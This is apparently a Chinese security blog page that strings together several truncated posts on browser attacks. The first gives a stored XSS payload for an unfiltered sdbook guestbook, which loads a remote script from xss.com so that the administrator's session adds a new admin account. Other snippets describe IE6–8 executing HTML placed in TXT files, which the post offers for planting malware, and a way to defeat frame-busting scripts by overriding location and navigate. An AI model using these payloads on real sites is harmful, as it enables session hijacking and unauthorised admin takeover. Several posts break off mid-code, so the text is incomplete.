作者:cnryan
来源:http://hi.baidu.com/cnryan

以往对XSS的利用大多数都是针对于挂马，钓鱼，盗cookie等，这些方式并没有真正发挥到XSS的作用，因为很少人能了解XSS的实质，会话劫持，浏览器劫持，XSS能做到的东西远远超乎我们的想象。

一 XSS下提升权限
随着AJAX技术在许多大型SNS网站的应用，XSS也变得愈加流行，在XSS场景下运用AJAX能更有效地发挥它的作用。
用户输入的地方最容易滋生XSS，譬如留言、评论等表单，我搭建了一个sdbook的留言本，因为sdbook没有对用户输入的变量作出合适的过滤，导致一个XSS的产生。
留言率先传递给管理员，当作javascript劫持，我们就可以利用管理员的权限做任何事情，例如添加一个管理员。

在留言内容输入跨站代码：

1

<script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";document.getElementsByTagName("head")[0].appendChild(s);</script>

这段代码用来加载远程的JS，而xss.js的内容是利用xmlHttp对象发送一个异步请求，通过XMLHTTP无刷新提交到服务器端，模拟添加一个管理员。
Read the rest of this entry

TXT文件中插入一段JAVA代码后

后边的HTML代码就会被IE执行

受影响版本IE6 7 8

测试地址：http://www.lixiaopeng.org/blog/wp-content/uploads/2009/07/txtguama.txt

转自:http://www.smxiaoqiang.cn/blog/227.html

网上通用的防插那版是（子）：if(top.location != self.location){top.location = self.location;

}
复制代码强插方案为（父）：var location="";
复制代码其中这个location是对被赋值的top.location方法的覆盖，导致方法失效。
昨天又遇到另外一个版本（子）：if(window!=parent){

parent.navigate(location);

}
复制代码强插方案为（父）：var navigate="";
复制代码即是对parent.navigate方法的覆盖，导致再次引用失效。
那么两个和在一起的强插方案是，在iframe之前加入：<script>var location="";var navigate="";</script>
复制代码介绍了"市面上"能见到的两种防御被iframe的方法，以及相应的变态突破方法。
貌似把"受害人"逼上绝路了，我们再来看看这两个方法：
它们都能够判断出自己已经被XX了，可是它们是怎么做的呢？
方法一说：先生，请您出去。
方法二说：同志，请您出去！
然而这先生也说了句："我就不出去！"
因为"受害人"和这位先生又不是一家子，似乎通过命令对方还无可奈何 -- 同源策略！
但事实上，"请您出去"这种方式显然是针对君子不对小人的，所以Monyer教你一种好方法--"乱棍打出去！"

<script>

window.onload = function(){

if(top!=self){ Read the rest of this entry